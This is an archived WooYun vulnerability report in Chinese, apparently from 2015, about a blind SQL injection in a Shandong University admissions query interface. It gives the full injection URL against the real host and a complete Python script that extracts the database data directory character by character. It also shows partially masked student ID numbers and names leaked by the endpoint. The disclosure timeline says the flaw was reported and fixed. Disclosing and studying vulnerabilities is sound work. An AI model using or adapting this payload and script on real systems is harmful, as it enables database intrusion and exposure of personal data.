乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-22: 细节已通知厂商并且等待厂商处理中 2015-10-22: 厂商已经确认,细节仅向厂商公开 2015-11-01: 细节向核心白帽子及相关领域专家公开 2015-11-10: 厂商已经修复漏洞并主动公开,细节向公众公开
山东大学某处泄露信息接口同时伴随B型get注入漏洞附脚本
访问 http://www.bkzs.sdu.edu.cn/queryadmit?examno=%27xor%28if%28now%28%29=sysdate%28%29%20and%20ascii%28mid%28@@datadir,1,1%29%29%3E1,sleep%281%29,1%29%29or%27b&idcard=e&name=c&year=2015&tn=monline_4_dg条件为真的时候获得学生身份信息
{"id":"43440","ssmc":"13河北","kslxmc":"器乐校考","ksh":"15130401***008","sfzh":"130404****01282419","xm":"张*昕","xb":"男","zymc":"音乐学(西洋器乐表演)","bz":"","year":"2015","tag":"1"}
条件为假的时候获得信息:
{"id":"43439","ssmc":"13河北","kslxmc":"器乐校考","ksh":"15130104***062","sfzh":"130104****12232429","xm":"费*汇","xb":"女","zymc":"音乐学(中国民族器乐表演)","bz":"","year":"2015","tag":"1"}
二注入验证脚本:
#coding=utf-8import sys,urllib2from optparse import OptionParserfrom urllib2 import Request,urlopen,URLError,HTTPErrorimport urllibresult=''def request(URL,data): #print URL user_agent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' } req = urllib2.Request(URL, data, user_agent) try: request = urllib2.urlopen(req) except HTTPError, e: if e.code == 500: return 'Runtime Error' except URLError, e: #print('[!] We failed to reach a server.') #print('[!] Reason: ' + str(e.reason)) sys.exit(1) return request.read()def binary_sqli(left, right, index): global result while 1: mid = (left + right)/2 if (right-left==1): result += chr(right) print 'datadir: ' ,result break payload = "a%%27xor(if(now()=sysdate()%%20and%%20ascii(mid(@@datadir,%s,1))>%s,sleep(1),1))or%%27b&idcard=e&name=c&year=2015&tn=monline_4_dg" % (index, mid) print payload # payload="" html = request('http://www.bkzs.sdu.edu.cn/queryadmit?examno='+payload,None) #print html verify = '43440' if verify in html: left = mid else: right = midif __name__ == '__main__': for i in range(1,21): binary_sqli(32, 127, i)
注入得到datadir:
参数过滤
危害等级:高
漏洞Rank:14
确认时间:2015-10-22 20:12
已通报系统所属单位处置
2015-11-10:已修复